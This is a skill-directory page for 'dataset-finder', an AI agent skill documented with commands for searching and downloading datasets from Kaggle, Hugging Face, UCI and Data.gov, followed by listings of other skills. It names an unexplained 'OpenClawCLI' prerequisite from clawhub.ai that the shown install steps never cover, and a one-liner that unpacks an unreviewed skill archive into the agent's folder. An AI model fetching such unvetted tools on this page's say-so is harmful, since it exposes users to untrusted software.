dataset-finder

Name: dataset-finder
Author: openclaw

0views

1installs

Use this skill when users need to search for datasets, download data files, or explore data repositories. Triggers include: requests to "find datasets", "search for data", "download dataset from Kaggle", "get data from Hugging Face", "find ML datasets", or mentions of data repositories like Kaggle, UCI ML Repository, Data.gov, or Hugging Face. Also use for previewing dataset statistics, generating data cards, or discovering datasets for machine learning projects. Requires OpenClawCLI installation from clawhub.ai.

Install

mkdir -p .claude/skills/dataset-finder && curl -L -o skill.zip "https://mcp.directory/api/skills/download/5555" && unzip -o skill.zip -d .claude/skills/dataset-finder && rm skill.zip

Installs to .claude/skills/dataset-finder

About this skill

Dataset Finder

Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.

⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)

Installation:

# Standard installation
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4

# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4

Never use --break-system-packages as it can damage your system's Python installation.

Quick Reference

Task	Command
Search Kaggle	`python scripts/dataset.py kaggle search "housing prices"`
Download Kaggle dataset	`python scripts/dataset.py kaggle download "username/dataset-name"`
Search Hugging Face	`python scripts/dataset.py huggingface search "sentiment"`
Download HF dataset	`python scripts/dataset.py huggingface download "dataset-name"`
Search UCI ML	`python scripts/dataset.py uci search "classification"`
Preview dataset	`python scripts/dataset.py preview dataset.csv`
Generate data card	`python scripts/dataset.py datacard dataset.csv --output README.md`
List local datasets	`python scripts/dataset.py list`

Core Features

1. Multi-Repository Search

Search across multiple data repositories from a single interface.

Supported Sources:

Kaggle - ML competitions and community datasets
Hugging Face - NLP, vision, and audio datasets
UCI ML Repository - Classic ML datasets
Data.gov - US government open data
Local - Manage downloaded datasets

2. Dataset Download

Download datasets with automatic format detection.

Supported formats:

CSV, TSV
JSON, JSONL
Parquet
Excel (XLSX, XLS)
ZIP archives
HDF5
Feather

3. Dataset Preview

Get quick statistics and insights without loading entire datasets.

Preview features:

Shape (rows × columns)
Column names and types
Missing value counts
Basic statistics (mean, std, min, max)
Memory usage
Sample rows

4. Data Card Generation

Automatically generate dataset documentation.

Includes:

Dataset description
Schema information
Statistics summary
Usage examples
License information
Citation details

Repository-Specific Commands

Kaggle

Search and download datasets from Kaggle.

Setup:

Get Kaggle API credentials from https://www.kaggle.com/settings
Place kaggle.json in ~/.kaggle/ (Linux/Mac) or %USERPROFILE%\.kaggle\ (Windows)

# Search datasets
python scripts/dataset.py kaggle search "house prices"

# Search with filters
python scripts/dataset.py kaggle search "NLP" --file-type csv --sort-by hotness

# Download dataset
python scripts/dataset.py kaggle download "zillow/zecon"

# Download specific files
python scripts/dataset.py kaggle download "username/dataset" --file "train.csv"

# List dataset files
python scripts/dataset.py kaggle list "username/dataset-name"

Search options:

--file-type - Filter by file type (csv, json, etc.)
--license - Filter by license type
--sort-by - Sort by hotness, votes, updated, or relevance
--max-results - Limit number of results

Output:

1. House Prices - Advanced Regression Techniques
   Owner: zillow/zecon
   Size: 1.5 MB
   Last updated: 2023-06-15
   Downloads: 150,000+
   URL: https://www.kaggle.com/datasets/zillow/zecon

2. Housing Prices Dataset
   Owner: username/housing-data
   Size: 850 KB
   Last updated: 2023-08-20
   Downloads: 50,000+
   URL: https://www.kaggle.com/datasets/username/housing-data

Hugging Face Datasets

Search and download datasets from Hugging Face Hub.

# Search datasets
python scripts/dataset.py huggingface search "sentiment analysis"

# Search with filters
python scripts/dataset.py huggingface search "NLP" --task text-classification --language en

# Download dataset
python scripts/dataset.py huggingface download "imdb"

# Download specific split
python scripts/dataset.py huggingface download "imdb" --split train

# Download specific configuration
python scripts/dataset.py huggingface download "glue" --config mrpc

# Stream large datasets
python scripts/dataset.py huggingface download "large-dataset" --streaming

Search options:

--task - Filter by task (text-classification, translation, etc.)
--language - Filter by language code
--multimodal - Include multimodal datasets
--benchmark - Only benchmark datasets
--max-results - Limit results

Output:

1. IMDB Movie Reviews
   Dataset ID: imdb
   Tasks: sentiment-classification
   Languages: en
   Size: 84.1 MB
   Downloads: 1M+
   URL: https://huggingface.co/datasets/imdb

2. Stanford Sentiment Treebank
   Dataset ID: sst2
   Tasks: sentiment-classification
   Languages: en
   Size: 7.4 MB
   Downloads: 500K+
   URL: https://huggingface.co/datasets/sst2

UCI ML Repository

Search and download classic ML datasets.

# Search datasets
python scripts/dataset.py uci search "classification"

# Search by characteristics
python scripts/dataset.py uci search "regression" --min-samples 1000

# Download dataset
python scripts/dataset.py uci download "iris"

# Download with metadata
python scripts/dataset.py uci download "wine-quality" --include-metadata

Search options:

--task-type - classification, regression, clustering
--min-samples - Minimum number of instances
--min-features - Minimum number of features
--data-type - tabular, text, image, time-series

Output:

1. Iris Dataset
   ID: iris
   Task: classification
   Samples: 150
   Features: 4
   Classes: 3
   Missing values: No
   URL: https://archive.ics.uci.edu/ml/datasets/iris

2. Wine Quality
   ID: wine-quality
   Task: classification/regression
   Samples: 6497
   Features: 11
   Missing values: No
   URL: https://archive.ics.uci.edu/ml/datasets/wine+quality

Data.gov

Search US government open data.

# Search datasets
python scripts/dataset.py datagov search "census"

# Search with organization filter
python scripts/dataset.py datagov search "health" --organization "cdc.gov"

# Search by topic
python scripts/dataset.py datagov search "education" --tags "schools,students"

# Download dataset
python scripts/dataset.py datagov download "dataset-id"

Search options:

--organization - Filter by publishing organization
--tags - Filter by tags (comma-separated)
--format - Filter by format (csv, json, xml, etc.)
--max-results - Limit results

Output:

1. 2020 Census Demographic Data
   Organization: census.gov
   Format: CSV
   Size: 125 MB
   Last updated: 2023-01-15
   Tags: census, demographics, population
   URL: https://catalog.data.gov/dataset/...

Dataset Management

Preview Datasets

Get quick insights without loading entire datasets.

# Basic preview
python scripts/dataset.py preview data.csv

# Detailed statistics
python scripts/dataset.py preview data.csv --detailed

# Custom sample size
python scripts/dataset.py preview data.csv --sample 20

# Multiple files
python scripts/dataset.py preview train.csv test.csv

Output:

Dataset: train.csv
Shape: 1000 rows × 15 columns
Size: 2.5 MB
Memory usage: 120 KB

Columns:
  - id (int64): no missing values
  - name (object): 5 missing values
  - age (int64): no missing values
  - income (float64): 12 missing values
  - category (object): no missing values

Numeric columns statistics:
           age       income
count   1000.0       988.0
mean      35.2     65432.1
std       12.5     25000.0
min       18.0     20000.0
max       75.0    150000.0

Categorical columns:
  - category: 5 unique values
  - name: 995 unique values

Sample (first 5 rows):
   id      name  age    income category
0   1  John Doe   35   65000.0        A
1   2  Jane Doe   28   55000.0        B
2   3  Bob Smith  42   85000.0        A
...

Generate Data Cards

Create standardized dataset documentation.

# Generate data card
python scripts/dataset.py datacard dataset.csv --output DATACARD.md

# Include statistics
python scripts/dataset.py datacard dataset.csv --include-stats --output README.md

# Custom template
python scripts/dataset.py datacard dataset.csv --template custom_template.md

# Multiple datasets
python scripts/dataset.py datacard train.csv test.csv --output-dir datacards/

Generated data card includes:

Dataset description
File information (size, format, rows, columns)
Schema (column names, types, descriptions)
Statistics (distributions, missing values, correlations)
Sample data
Usage examples
License and citation
Known issues/limitations

Example output (DATACARD.md):

# Dataset Card: Housing Prices

## Dataset Description
This dataset contains housing prices and features for regression analysis.

## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81

## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...

## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)

## Usage
```python
import pandas as pd
df = pd.read_csv('housing_prices.csv')

License

Creative Commons


### List Local Datasets

Manage downloaded datasets.

```bash
# List all datasets
python scripts/dataset.py list

# List with details
python scripts/dataset.py list --detailed

# Filter by source
python scripts/dataset.py list --so

---

*Content truncated.*

More by openclaw

View all skills by openclaw →

a-stock-analysis

openclaw

A股实时行情与分时量能分析。获取沪深股票实时价格、涨跌、成交量，分析分时量能分布（早盘/尾盘放量）、主力动向（抢筹/出货信号）、涨停封单。支持持仓管理和盈亏分析。Use when: (1) 查询A股实时行情, (2) 分析主力资金动向, (3) 查看分时成交量分布, (4) 管理股票持仓, (5) 分析持仓盈亏。

755288

fivem

openclaw

Fix, create, or validate FiveM server resources for QBCore/ESX (config.lua, fxmanifest.lua, items, housing/furniture, scripts, MLOs). Use when asked to debug resource errors, convert ESX↔QB, update fxmanifest versions, add items, or source scripts from GitHub. Also use for SSH key generation for SFTP access.

414258

research-paper-writer

openclaw

Creates formal academic research papers following IEEE/ACM formatting standards with proper structure, citations, and scholarly writing style. Use when the user asks to write a research paper, academic paper, or conference paper on any topic.

81168

keyword-research

openclaw

Discovers high-value keywords with search intent analysis, difficulty assessment, and content opportunity mapping. Essential for starting any SEO or GEO content strategy.

441107

html-to-ppt

openclaw

Convert HTML/Markdown to PowerPoint presentations using Marp

33389

weread

openclaw

WeChat Reading (微信读书) CLI tool for fetching notes and highlights. Use when: (1) user asks about weread/微信读书 notes or highlights, (2) fetching today's or recent reading notes, (3) exporting book highlights, (4) managing reading bookshelf, (5) any task involving reading notes from WeChat Reading.

11285

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

2,8712,521

pdf-to-markdown

aliceisjustplaying

Convert entire PDF documents to clean, structured Markdown for full context loading. Use this skill when the user wants to extract ALL text from a PDF into context (not grep/search), when discussing or analyzing PDF content in full, when the user mentions "load the whole PDF", "bring the PDF into context", "read the entire PDF", or when partial extraction/grepping would miss important context. This is the preferred method for PDF text extraction over page-by-page or grep approaches.

3,7991,653

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

2,1491,640

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

2,2651,465

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

2,4611,222

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

1,955969

Related MCP Servers

Browse all servers

HeyOnCall

HeyOnCall sends automated phone notifications via a hosted paging service to alert on-call teams when long-running tasks complete or need assistance.

0 tools

Google Cloud

Effortlessly manage Google Cloud with this user-friendly multi cloud management platform—simplify operations, automate tasks, and boost confidence.

7010 tools

Tencent EdgeOne Pages

Effortlessly deploy static sites with EdgeOne Pages—an easy, scalable alternative to Amazon website hosting for fast, reliable delivery.

3961 tools

Rtfmbro

Rtfmbro is an MCP server for config management tools—get real-time, version-specific docs from GitHub for Python, Node.js, and more.

774 tools

AI Intervention Agent

AI Intervention Agent enables human-in-the-loop AI with real-time intervention via a web UI—review context, give feedback, and monitor MCP agents to keep them…

31 tools

Sound Notification

Enhance productivity with customizable audio notifications in your development environment. Ideal for game dev softwares and php development tools.

20 tools

Install

mkdir -p .claude/skills/dataset-finder && curl -L -o skill.zip "https://mcp.directory/api/skills/download/5555" && unzip -o skill.zip -d .claude/skills/dataset-finder && rm skill.zip

Installs to .claude/skills/dataset-finder

Stats

Views

Installs

Author

openclaw

7 skills published

Links

Source Code

dataset-finder

Install

About this skill

Dataset Finder

Quick Reference

Core Features

1. Multi-Repository Search

2. Dataset Download

3. Dataset Preview

4. Data Card Generation

Repository-Specific Commands

Kaggle

Hugging Face Datasets

UCI ML Repository

Data.gov

Dataset Management

Preview Datasets

Generate Data Cards

License

More by openclaw

a-stock-analysis

fivem

research-paper-writer

keyword-research

html-to-ppt

weread

You might also like

ui-ux-pro-max

pdf-to-markdown

flutter-development

drawio-diagrams-enhanced

godot

nano-banana-pro

Related MCP Servers